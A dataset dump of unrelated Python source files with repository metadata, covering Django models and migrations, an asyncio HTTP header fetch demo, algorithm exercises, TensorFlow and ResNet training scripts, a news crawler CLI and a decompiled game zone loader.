('Calendar', '0021_auto_20200405_1321'),
]
operations = [
migrations.AlterField(
model_name='calendar',
name='Σημειώσεις',
field=models.CharField(blank=True, max_length=5000, null=True),
),
]
|
[
"ntinisiordanis@gmail.com"
] |
ntinisiordanis@gmail.com
|
a2dc7d962e925ae61393016853778208544ae2cf
|
361459069b1b2eb5adb180d1f61241742d2fbcd8
|
/chapter19/web_connect_test.py
|
fce8848c7c0dfe21207a76daa684fa204abaff31
|
[] |
no_license
|
tangkaiyang/python3_laioxuefeng
|
1704e72163aa55ce177e5b7a88a3e7501b415ceb
|
02400db01f144417ef202e6c135561c304cacb3a
|
refs/heads/master
| 2020-04-28T15:13:17.163004
| 2019-08-06T07:53:18
| 2019-08-06T07:53:18
| 175,364,941
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 811
|
py
|
# -*- coding:UTF-8 -*-
# 用asyncio的异步网络连接来获取sina,sohu和163的网站首页:
import asyncio
@asyncio.coroutine
def wget(host):
print('wget %s...' % host)
connect = asyncio.open_connection(host, 80)
reader, writer = yield from connect
header = 'GET / HTTP/1.0\r\nHost: %s\r\n\r\n' % host
writer.write(header.encode('utf-8'))
yield from writer.drain()
while True:
line = yield from reader.readline()
if line == b'\r\n':
break
print('%s header > %s' % (host, line.decode('utf-8').rstrip()))
# Ignore the body, close the socket
writer.close()
loop = asyncio.get_event_loop()
tasks = [wget(host) for host in ['www.sina.com.cn', 'www.sohu.com', 'www.163.com']]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
|
[
"945541696@qq.com"
] |
945541696@qq.com
|
e45eaf86cbf8d480bd4e852ab5145b3d56778d7c
|
9ed7bd97e2140c69091aef63a8de1991e3bc7f3d
|
/递归/简单递归例子.py
|
8eb57c77374ff9d8e0a81030c185d1bed6d231e9
|
[] |
no_license
|
EruDev/Learn_Algorithms
|
d8a422d02f000ba428bc05f80cdf40860504946a
|
71c98599d84a33727fc434826bab800311053d8e
|
refs/heads/master
| 2020-03-15T12:42:22.625351
| 2018-07-30T02:30:04
| 2018-07-30T02:30:04
| 132,150,091
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 136
|
py
|
# coding: utf-8
def countdown(i):
if i < 0:
return
else:
countdown(i - 1)
print(i)
if __name__ == '__main__':
countdown(100)
|
[
"1027926875@qq.com"
] |
1027926875@qq.com
|
32e507dd74d087d7274fd08b3587e4d135fa1fbe
|
a9063fd669162d4ce0e1d6cd2e35974274851547
|
/test/test_tsp_account1.py
|
4676fce503d1768ca6306fed2f92039a0e1746ba
|
[] |
no_license
|
rootalley/py-zoom-api
|
9d29a8c750e110f7bd9b65ff7301af27e8518a3d
|
bfebf3aa7b714dcac78be7c0affb9050bbce8641
|
refs/heads/master
| 2022-11-07T14:09:59.134600
| 2020-06-20T18:13:50
| 2020-06-20T18:13:50
| 273,760,906
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,376
|
py
|
# coding: utf-8
"""
Zoom API
The Zoom API allows developers to safely and securely access information from Zoom. You can use this API to build private services or public applications on the [Zoom App Marketplace](http://marketplace.zoom.us). To learn how to get your credentials and create private/public applications, read our [Authorization Guide](https://marketplace.zoom.us/docs/guides/authorization/credentials). All endpoints are available via `https` and are located at `api.zoom.us/v2/`. For instance you can list all users on an account via `https://api.zoom.us/v2/users/`. # noqa: E501
OpenAPI spec version: 2.0.0
Contact: developersupport@zoom.us
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from models.tsp_account1 import TSPAccount1 # noqa: E501
from swagger_client.rest import ApiException
class TestTSPAccount1(unittest.TestCase):
"""TSPAccount1 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testTSPAccount1(self):
"""Test TSPAccount1"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.tsp_account1.TSPAccount1() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"github@rootalley.com"
] |
github@rootalley.com
|
5cf7b38d124d0c0e7bf9b0f518fef34621713742
|
576cc83449e10fd3f98281970c46016ea7a5aea2
|
/Tensorflow/CNN/模型的保存与恢复.py
|
5afbe1506eead1e2b7385c4097be42da24c579d7
|
[] |
no_license
|
HotView/PycharmProjects
|
215ab9edd341e3293daebcf86d97537f8cd28d75
|
61393fe5ba781a8c1216a5cbe7e0d06149a10190
|
refs/heads/master
| 2020-06-02T07:41:53.608742
| 2019-11-13T08:31:57
| 2019-11-13T08:31:57
| 191,085,178
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 578
|
py
|
import tensorflow as tf
## 模型的保存
save_path ='...'
saver = tf.train.Saver()
sess = tf.Session()
saver.save(sess,save_path)
## 模型的恢复
save_path = ".."
saver = tf.train.Saver()
sess= tf.Session()
saver.restore(sess,save_path)
## 多次模型的保存和恢复
save_path = ".."
saver = tf.train.Saver()
sess= tf.Session()
epoch = 5
n =None
if epoch%n==0:
saver.save(sess,save_path,global_step=epoch)
## 恢复最新的模型
save_path = ".."
model = tf.train.latest_checkpoint(save_path)
saver = tf.train.Saver()
sess= tf.Session()
saver.restore(sess,model)
|
[
"864773190@qq.com"
] |
864773190@qq.com
|
b9fc0aa48976be5a27682e1ba77b1e50abc59b40
|
be3c759bd915887a384d1ef437ebf7277c75bd06
|
/DynamicProgramming/BestTimeToBuyAndSellStock.py
|
dbf1090d26ca00a049bf614f03d64d5d63303251
|
[] |
no_license
|
yistar-traitor/LeetCode
|
c24411763d541b6eaf9ccc344c3fd24f9a00e633
|
0dd48b990f8bd0874630b1860361c6b3b2c801f6
|
refs/heads/master
| 2020-09-28T20:46:45.016872
| 2019-12-18T02:25:34
| 2019-12-18T02:25:34
| 226,861,515
| 0
| 0
| null | 2019-12-18T02:25:36
| 2019-12-09T12:04:01
| null |
UTF-8
|
Python
| false
| false
| 2,292
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/8/24 0:03
# @Author : tc
# @File : BestTimeToBuyAndSellStock.py
"""
给定一个数组,它的第 i 个元素是一支给定股票第 i 天的价格。
如果你最多只允许完成一笔交易(即买入和卖出一支股票),设计一个算法来计算你所能获取的最大利润。
注意你不能在买入股票前卖出股票
Input1:[7,1,5,3,6,4]
Output1:5
解释: 在第 2 天(股票价格 = 1)的时候买入,在第 5 天(股票价格 = 6)的时候卖出,最大利润 = 6-1 = 5 。
注意利润不能是 7-1 = 6, 因为卖出价格需要大于买入价格。
Input1:[7,6,4,3,1]
Output1:0
解释: 在这种情况下, 没有交易完成, 所以最大利润为 0。
提示:动态规划 前i天的最大收益 = max{前i-1天的最大收益,第i天的价格-前i-1天中的最小价格}
优化后的代码真优雅
"""
#解法1
def maxProfit(prices):
m = len(prices)
if m in [0,1]:
return 0
dp = [0] * m
min_buy = float('inf')
for i in range(m-1):
min_buy = min(min_buy, prices[i])
if prices[i+1] >= prices[i]:
dp[i+1] = max(dp[i], prices[i+1] - min_buy)
else:
dp[i+1] = dp[i]
return dp[-1]
#优化后
def maxProfit2(prices):
min_p, max_p = 999999, 0
for i in range(len(prices)):
min_p = min(min_p, prices[i])
max_p = max(max_p, prices[i] - min_p)
return max_p
#解法二:利用状态机具体参考含手续费那题
"""
状态转移:
手里持有股票 -> 观望 -> 手里有股票
手里没有股票 -> 买入 -> 手里有股票
手里持有股票 -> 抛出 -> 手里没有股票
手里没有股票 -> 观望 -> 手里没有股票
"""
def maxProfit3(prices):
m = len(prices)
if not m:
return 0
dp_hold = [0] * m
dp_cash = [0] * m
dp_hold[0] = -prices[0]
for i in range(1, m):
dp_hold[i] = max(dp_hold[i - 1], -prices[i]) #注意这里,由于只有一次买入和抛出的机会,所以手里持有股票的最大收益就是购买该股票的成本
dp_cash[i] = max(dp_cash[i - 1],dp_hold[i -1] + prices[i])
return dp_cash[-1]
if __name__ == '__main__':
prices = [7,6,4,3,1]
print(maxProfit(prices))
|
[
"2448424636@qq.com"
] |
2448424636@qq.com
|
2eb85d7c15450d4573568b284adfb1ab5a709c2d
|
d389c87cd0c160a0efad8f6eb1eefc221af35147
|
/api/models.py
|
9368acaeaef04b3cffd21f8d4ab6380b1ac3c700
|
[] |
no_license
|
shotaro0726/drf-vue1
|
a9bced0c937b03fbd55f5f7e90c945bfadef560f
|
be68ee78d786029b1f7d3da1490312d6b5c096b0
|
refs/heads/master
| 2022-09-03T07:49:23.861354
| 2020-05-24T12:05:31
| 2020-05-24T12:05:31
| 265,808,817
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,637
|
py
|
from django.db import models
from user.models import User
from markdownx.models import MarkdownxField
from markdownx.utils import markdown
class Category(models.Model):
name = models.CharField(max_length=25, unique=True)
post_num = models.IntegerField(default=0, null=False)
description = models.TextField(blank=True)
def __str__(self):
return self.name
def get_name(self):
return self.name
class Post(models.Model):
title = models.CharField(max_length=30)
content = MarkdownxField()
created = models.DateTimeField(auto_now_add=True)
author = models.ForeignKey(User, on_delete=models.PROTECT)
category = models.ForeignKey(Category, blank=True, null=True, on_delete=models.SET_NULL)
class Meta:
ordering = ['-created',]
def __str__(self):
return '{} :: {}'.format(self.title, self.author)
def get_absolute_url(self):
return '/blog/{}/'.format(self.pk)
def get_update_url(self):
return self.get_absolute_url() + 'update/'
def get_markdown_content(self):
return markdown(self.content)
class Comment(models.Model):
post = models.ForeignKey(Post, related_name='comments', on_delete=models.CASCADE)
text = MarkdownxField()
authir = models.ForeignKey(User, on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
modified_at = models.DateTimeField(auto_now=True)
def get_markdown_content(self):
return markdown(self.text)
def get_absolute_url(self):
return self.post.get_absolute_url() + '#commnet-id-{}'.format(self.pk)
|
[
"shoutaro0726@gmail.com"
] |
shoutaro0726@gmail.com
|
a55e9c23dd7f6b0f13a8454e381e54949fe5a30a
|
9f9f4280a02f451776ea08365a3f119448025c25
|
/plans/hsppw/qcut_hsp-s_025_pwde_mlpc_hs.py
|
01b83466a393659ca5738a2724501fe600601146
|
[
"BSD-2-Clause"
] |
permissive
|
dbis-uibk/hit-prediction-code
|
6b7effb2313d2499f49b2b14dd95ae7545299291
|
c95be2cdedfcd5d5c27d0186f4c801d9be475389
|
refs/heads/master
| 2023-02-04T16:07:24.118915
| 2022-09-22T12:49:50
| 2022-09-22T12:49:50
| 226,829,436
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,161
|
py
|
"""Plan using all features."""
import os.path
from dbispipeline.evaluators import CvEpochEvaluator
from sklearn.neural_network import MLPClassifier
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler
import hit_prediction_code.common as common
from hit_prediction_code.dataloaders import ClassLoaderWrapper
from hit_prediction_code.dataloaders import EssentiaLoader
from hit_prediction_code.dataloaders import QcutLoaderWrapper
import hit_prediction_code.evaluations as evaluations
from hit_prediction_code.models.pairwise import PairwiseOrdinalModel
from hit_prediction_code.result_handlers import print_results_as_json
from hit_prediction_code.transformers.label import compute_hit_score_on_df
PATH_PREFIX = 'data/hit_song_prediction_msd_bb_lfm_ab/processed'
number_of_classes = 25
dataloader = ClassLoaderWrapper(
wrapped_loader=QcutLoaderWrapper(
wrapped_loader=EssentiaLoader(
dataset_path=os.path.join(
PATH_PREFIX,
'hsp-s_acousticbrainz.parquet',
),
features=[
*common.all_no_year_list(),
],
label='yang_hit_score',
nan_value=0,
data_modifier=lambda df: compute_hit_score_on_df(
df,
pc_column='lastfm_playcount',
lc_column='lastfm_listener_count',
hit_score_column='yang_hit_score',
),
),
number_of_bins=number_of_classes,
),
labels=list(range(number_of_classes)),
)
pipeline = Pipeline([
('scale', MinMaxScaler()),
('model',
PairwiseOrdinalModel(
wrapped_model=MLPClassifier(
hidden_layer_sizes=(256, 128, 128, 128, 64),
verbose=True,
),
pairs_factor=3.,
threshold_type='average',
pair_strategy='random',
pair_encoding='delta',
threshold_sample_training=False,
)),
])
evaluator = CvEpochEvaluator(
cv=evaluations.cv(),
scoring=evaluations.metrics.ordinal_classifier_scoring(),
scoring_step_size=1,
)
result_handlers = [
print_results_as_json,
]
|
[
"mikevo-uibk@famv.net"
] |
mikevo-uibk@famv.net
|
8c65456eca2603036d5dbbcba1658c39a7b9998b
|
babaa6284820ae5ede8e0bb257cb802913ebe976
|
/ML01-Python_Introduction/05_boolean_true_false.py
|
d92aa8f2e5de06ea1f65f5df33e7d8a3b9ac8b6b
|
[] |
no_license
|
kevinelong/ML
|
c6a69be96202248214ed3c0db5d2514be8559411
|
93f430e31f1470cf1ac3ab6ee8ab5d701b3fc6e7
|
refs/heads/master
| 2023-05-02T12:08:32.693948
| 2021-05-21T19:21:28
| 2021-05-21T19:21:28
| 369,008,732
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
isCool = True
isTooCool = False
print(isCool)
isGreater: bool = 3 > 2
isSame: bool = 2 + 2 == 4
print(isGreater)
print(isSame)
|
[
"kevinelong@gmail.com"
] |
kevinelong@gmail.com
|
a0a6c50f47ed536930fa9134d3ec75092e91ac68
|
6b791247919f7de90c8402abcca64b32edd7a29b
|
/lib/coginvasion/hood/DGSafeZoneLoader.py
|
424ee7563b7c2f46dbeca8897532f40739267a72
|
[
"Apache-2.0"
] |
permissive
|
theclashingfritz/Cog-Invasion-Online-Dump
|
a9bce15c9f37b6776cecd80b309f3c9ec5b1ec36
|
2561abbacb3e2e288e06f3f04b935b5ed589c8f8
|
refs/heads/master
| 2021-01-04T06:44:04.295001
| 2020-02-14T05:23:01
| 2020-02-14T05:23:01
| 240,434,213
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,152
|
py
|
# uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: lib.coginvasion.hood.DGSafeZoneLoader
from lib.coginvasion.holiday.HolidayManager import HolidayType
import SafeZoneLoader, DGPlayground
class DGSafeZoneLoader(SafeZoneLoader.SafeZoneLoader):
def __init__(self, hood, parentFSM, doneEvent):
SafeZoneLoader.SafeZoneLoader.__init__(self, hood, parentFSM, doneEvent)
self.playground = DGPlayground.DGPlayground
self.pgMusicFilename = 'phase_8/audio/bgm/DG_nbrhood.mid'
self.interiorMusicFilename = 'phase_8/audio/bgm/DG_SZ.mid'
self.battleMusicFile = 'phase_3.5/audio/bgm/encntr_general_bg.mid'
self.invasionMusicFiles = [
'phase_12/audio/bgm/BossBot_CEO_v1.mid',
'phase_9/audio/bgm/encntr_suit_winning.mid']
self.tournamentMusicFiles = [
'phase_3.5/audio/bgm/encntr_nfsmw_bg_1.ogg',
'phase_3.5/audio/bgm/encntr_nfsmw_bg_2.ogg',
'phase_3.5/audio/bgm/encntr_nfsmw_bg_3.ogg',
'phase_3.5/audio/bgm/encntr_nfsmw_bg_4.ogg']
self.bossBattleMusicFile = 'phase_7/audio/bgm/encntr_suit_winning_indoor.mid'
self.dnaFile = 'phase_8/dna/daisys_garden_sz.pdna'
self.szStorageDNAFile = 'phase_8/dna/storage_DG_sz.pdna'
self.szHolidayDNAFile = None
if base.cr.holidayManager.getHoliday() == HolidayType.CHRISTMAS:
self.szHolidayDNAFile = 'phase_8/dna/winter_storage_DG_sz.pdna'
self.telescope = None
self.birdNoises = [
'phase_8/audio/sfx/SZ_DG_bird_01.ogg',
'phase_8/audio/sfx/SZ_DG_bird_02.ogg',
'phase_8/audio/sfx/SZ_DG_bird_03.ogg',
'phase_8/audio/sfx/SZ_DG_bird_04.ogg']
return
def load(self):
SafeZoneLoader.SafeZoneLoader.load(self)
hq = self.geom.find('**/*toon_landmark_hqDG*')
hq.find('**/doorFrameHoleLeft_0').stash()
hq.find('**/doorFrameHoleRight_0').stash()
hq.find('**/doorFrameHoleLeft_1').stash()
hq.find('**/doorFrameHoleRight_1').stash()
|
[
"theclashingfritz@users.noreply.github.com"
] |
theclashingfritz@users.noreply.github.com
|
406903fe9df4ba09c0d193fe84efd2cd76bc4e47
|
4c9e3a963aef1d8f0cea9edc35e3c5ffc64a87d1
|
/tornado-frame/commands/sqlload.py
|
19506d19d86fd44141c5870c37f821fb4d09ba89
|
[] |
no_license
|
hackrole/daily-program
|
d6820d532a9ebb8132676e58da8e2382bd459b8f
|
cff87a09f03ce5bd9e186b0302bead6cd8484ab5
|
refs/heads/master
| 2021-01-21T13:11:55.287908
| 2015-04-21T14:34:36
| 2015-04-21T14:34:36
| 17,940,553
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 416
|
py
|
#!/usr/bin/env python
# encoding: utf-8
import sys
import cPickle as pickle
from os import path
def load_database(db_session, fixture):
"""
load the database data for the fixtures,
the fixture is a file path
"""
# TODO: the fixture file path controls
# load the fixture
datas = pickle.loads(fixture)
db_session.add_all(datas)
db_session.commit()
print "load database ok"
|
[
"daipeng123456@gmail.com"
] |
daipeng123456@gmail.com
|
ab1003d7efdeb5fc332d4f1e755524aee27b2773
|
8a49aafeea46ded564dd2482350f82b4334436ed
|
/dataloaders/path.py
|
9814116a02c91cdb947275fff256967754e3365b
|
[] |
no_license
|
yifuxiong/Deeplab_pytorch
|
1f96cd69a5597edc2021c24a5b88e462f67cb738
|
530809110156625945dfabd9b6dec0b2c0190415
|
refs/heads/master
| 2022-06-24T19:55:28.687829
| 2019-02-19T08:22:09
| 2019-02-19T08:22:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 523
|
py
|
# -*- coding: utf-8 -*-
"""
@Time : 2019/1/30 19:30
@Author : Wang Xin
@Email : wangxin_buaa@163.com
"""
class Path(object):
@staticmethod
def db_root_dir(database):
if database == 'pascal':
return '/home/data/model/wangxin/VOCdevkit/VOC2012/' # folder that contains VOCdevkit/.
elif database == 'vocaug':
return '/home/data/model/wangxin/VOCAug/'
else:
print('Database {} not available.'.format(database))
raise NotImplementedError
|
[
"wangxin_buaa@163.com"
] |
wangxin_buaa@163.com
|
31be3bffebdfd775abbd2a5ef8f4ee6bdc9cff3c
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/abc010/B/4887036.py
|
ba13d3e730ec5dd09e19a0574b60ad637de85cd5
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
N = int(input())
maisu = list(map(int, input().split()))
ans = 0
for i in maisu:
while (i % 3 == 2 or i % 2 == 0):
if (i % 3 == 2):
ans += 1
i -= 1
if (i % 2 == 0):
ans += 1
i -= 1
print(ans)
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
7dc7064cb13f7cbf99bae8290d431be03989ad48
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/380/usersdata/321/76866/submittedfiles/testes.py
|
e60134f230e927dc05748590d538982d937d6895
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131
|
py
|
# -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
#ENTRADA
m= float(input('Digite um valor em metros: '))
c= (m*100)
print('%.1f cm' % c)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
ed9770b7effbdb44aa1fcb0abbaef7af6a08b6c7
|
47b40cce73500801c7216d16c3bf8629d8305e8c
|
/tools/tensorpack/examples/ResNet/svhn-resnet.py
|
b22bd115b73ddf6284d6c15c57c06a6e8ad71a16
|
[
"Apache-2.0"
] |
permissive
|
laceyg/ternarynet
|
a19d402a8bf5e54c477f4dd64273b899664a8f17
|
b17744c2aba3aba7e7e72decb3b8a02792d33b54
|
refs/heads/master
| 2020-02-26T14:15:37.507028
| 2017-03-06T18:05:22
| 2017-03-06T18:05:22
| 83,691,489
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,988
|
py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# File: svhn-resnet.py
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import tensorflow as tf
import argparse
import numpy as np
import os
from tensorpack import *
from tensorpack.tfutils.symbolic_functions import *
from tensorpack.tfutils.summary import *
"""
ResNet-110 for SVHN Digit Classification.
Reach 1.8% validation error after 70 epochs, with 2 TitanX. 2it/s.
You might need to adjust the learning rate schedule when running with 1 GPU.
"""
import imp
cifar_example = imp.load_source('cifar_example',
os.path.join(os.path.dirname(__file__), 'cifar10-resnet.py'))
Model = cifar_example.Model
BATCH_SIZE = 128
def get_data(train_or_test):
isTrain = train_or_test == 'train'
pp_mean = dataset.SVHNDigit.get_per_pixel_mean()
if isTrain:
d1 = dataset.SVHNDigit('train')
d2 = dataset.SVHNDigit('extra')
ds = RandomMixData([d1, d2])
else:
ds = dataset.SVHNDigit('test')
if isTrain:
augmentors = [
imgaug.CenterPaste((40, 40)),
imgaug.Brightness(10),
imgaug.Contrast((0.8,1.2)),
imgaug.GaussianDeform( # this is slow. without it, can only reach 1.9% error
[(0.2, 0.2), (0.2, 0.8), (0.8,0.8), (0.8,0.2)],
(40, 40), 0.2, 3),
imgaug.RandomCrop((32, 32)),
imgaug.MapImage(lambda x: x - pp_mean),
]
else:
augmentors = [
imgaug.MapImage(lambda x: x - pp_mean)
]
ds = AugmentImageComponent(ds, augmentors)
ds = BatchData(ds, 128, remainder=not isTrain)
if isTrain:
ds = PrefetchData(ds, 5, 5)
return ds
def get_config():
logger.auto_set_dir()
# prepare dataset
dataset_train = get_data('train')
step_per_epoch = dataset_train.size()
dataset_test = get_data('test')
lr = get_scalar_var('learning_rate', 0.01, summary=True)
return TrainConfig(
dataset=dataset_train,
optimizer=tf.train.MomentumOptimizer(lr, 0.9),
callbacks=Callbacks([
StatPrinter(),
ModelSaver(),
InferenceRunner(dataset_test,
[ScalarStats('cost'), ClassificationError() ]),
ScheduledHyperParamSetter('learning_rate',
[(1, 0.1), (20, 0.01), (28, 0.001), (50, 0.0001)])
]),
model=Model(n=18),
step_per_epoch=step_per_epoch,
max_epoch=500,
)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')
parser.add_argument('--load', help='load model')
args = parser.parse_args()
if args.gpu:
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
config = get_config()
if args.load:
config.session_init = SaverRestore(args.load)
if args.gpu:
config.nr_tower = len(args.gpu.split(','))
SyncMultiGPUTrainer(config).train()
|
[
"ppwwyyxxc@gmail.com"
] |
ppwwyyxxc@gmail.com
|
54c140dea6736faad18cb4b357753ab8fe9c78d5
|
0cba5529e387ba0f077b4e8ddeb96f914004f5df
|
/misc/crawl/main.py
|
f61ef4cffc7591cf3323b98f28e84f45b993d08d
|
[
"MIT"
] |
permissive
|
AsyrafAzlan/Malaya
|
dc78398ee6880578f40c5646a48882a5913217ae
|
3d5166173cf74881f7a56fffaaf391813c55d4f1
|
refs/heads/master
| 2021-05-21T22:47:41.863857
| 2020-04-03T15:00:21
| 2020-04-03T15:00:21
| 252,841,526
| 1
| 0
|
MIT
| 2020-04-03T21:04:44
| 2020-04-03T21:04:44
| null |
UTF-8
|
Python
| false
| false
| 1,449
|
py
|
import sys
import argparse
def check_positive(value):
ivalue = int(value)
if ivalue <= 0:
raise argparse.ArgumentTypeError(
'%s is an invalid positive int value' % value
)
return ivalue
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--issue', required = True, help = 'issue to search')
ap.add_argument(
'-s',
'--start',
type = check_positive,
required = True,
help = 'year start to crawl',
)
ap.add_argument(
'-e',
'--end',
type = check_positive,
required = True,
help = 'year end to crawl',
)
ap.add_argument(
'-l',
'--limit',
type = check_positive,
required = True,
help = 'limit of articles to crawl',
)
ap.add_argument(
'-p',
'--sleep',
type = check_positive,
default = 10,
help = 'seconds to sleep for every 10 articles',
)
ap.add_argument(
'-m', '--malaya', default = False, help = 'boolean to use Malaya'
)
args = vars(ap.parse_args())
from core import google_news_run
import json
xgb_model = None
if args['malaya']:
import malaya
xgb_model = malaya.xgb_detect_languages()
results = google_news_run(
args['issue'],
limit = args['limit'],
year_start = args['start'],
year_end = args['end'],
debug = False,
sleep_time_every_ten_articles = args['sleep'],
xgb_model = xgb_model,
)
with open(args['issue'] + '.json', 'w') as fopen:
fopen.write(json.dumps(results))
|
[
"husein.zol05@gmail.com"
] |
husein.zol05@gmail.com
|
d9ff74cab1b9b382b1a78451ee982e6b7ca7fcf1
|
f0316e656767cf505b32c83eef4df13bb9f6b60c
|
/LeetCode/Python/Easy/1603_design_parking_system.py
|
34b0d5713382c201f7ab08da8a4483f7bda44d32
|
[] |
no_license
|
AkshdeepSharma/Classroom
|
70ec46b35fab5fc4a9d2eac430659d7dafba93da
|
4e55799466c101c736de6c7e07d716ff147deb83
|
refs/heads/master
| 2022-06-13T18:14:03.236503
| 2022-05-17T20:16:28
| 2022-05-17T20:16:28
| 94,828,359
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 657
|
py
|
class ParkingSystem:
def __init__(self, big: int, medium: int, small: int):
self.big = big
self.medium = medium
self.small = small
def addCar(self, carType: int) -> bool:
if carType == 1 and self.big > 0:
self.big -= 1
return True
if carType == 2 and self.medium > 0:
self.medium -= 1
return True
if carType == 3 and self.small > 0:
self.small -= 1
return True
return False
# Your ParkingSystem object will be instantiated and called as such:
# obj = ParkingSystem(big, medium, small)
# param_1 = obj.addCar(carType)
|
[
"akshdeep.sharma1@gmail.com"
] |
akshdeep.sharma1@gmail.com
|
bc85782c3aeb9a7be067f9ec854daf239eaefaa4
|
6f1a0823a28955f0f44fc69862ebd3ab873d79a3
|
/choices/admin.py
|
f9fccb307608bf20ae3e5cc14e4fe20e1799710e
|
[] |
no_license
|
tommydangerous/spadetree
|
69c437c7ea543a2a3906fc60ff223fa1ac16a1d8
|
04a7fcecf2c79db02c1cc2f9de733cf54009836a
|
refs/heads/master
| 2020-05-03T21:43:14.509381
| 2014-10-07T04:27:59
| 2014-10-07T04:27:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 718
|
py
|
from django.contrib import admin
from choices.models import Choice, ChoiceNote
class ChoiceAdmin(admin.ModelAdmin):
list_display = ('pk', 'tutor', 'tutee', 'interest', 'created', 'accepted',
'denied', 'completed', 'date_completed', 'content', 'tutor_viewed',
'tutee_viewed', 'day', 'hour', 'date', 'address', 'city', 'state',)
list_display_links = ('tutee', 'tutor',)
search_fields = ('tutee', 'tutor',)
class ChoiceNoteAdmin(admin.ModelAdmin):
list_display = ('pk', 'user', 'choice', 'content',)
list_display_links = ('pk', 'user',)
search_fields = ('content',)
admin.site.register(Choice, ChoiceAdmin)
admin.site.register(ChoiceNote, ChoiceNoteAdmin)
|
[
"quantumventuress@gmail.com"
] |
quantumventuress@gmail.com
|
c0e3a391ef5b8736bfaa7b0ae24781444cd7257e
|
563274d0bfb720b2d8c4dfe55ce0352928e0fa66
|
/TestProject/src/intellect/examples/rulesfest/BagOfWool.py
|
c81e60f5a0de75ca5d9b3d74d5a8de8012a8f7bf
|
[] |
no_license
|
wangzhengbo1204/Python
|
30488455637ad139abc2f173a0a595ecaf28bcdc
|
63f7488d9df9caf1abec2cab7c59cf5d6358b4d0
|
refs/heads/master
| 2020-05-19T19:48:27.092764
| 2013-05-11T06:49:41
| 2013-05-11T06:49:41
| 6,544,357
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,855
|
py
|
"""
Copyright (c) 2011, Michael Joseph Walsh.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. All advertising materials mentioning features or use of this software
must display the following acknowledgement:
This product includes software developed by the author.
4. Neither the name of the author nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ''AS IS'' AND ANY
EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
'''
Created on Aug 29, 2011
@author: Michael Joseph Walsh
'''
class BagOfWool(object):
'''
Used to signify a bag of wool
'''
def __init__(self):
'''
BagsOfWool Initializer
'''
|
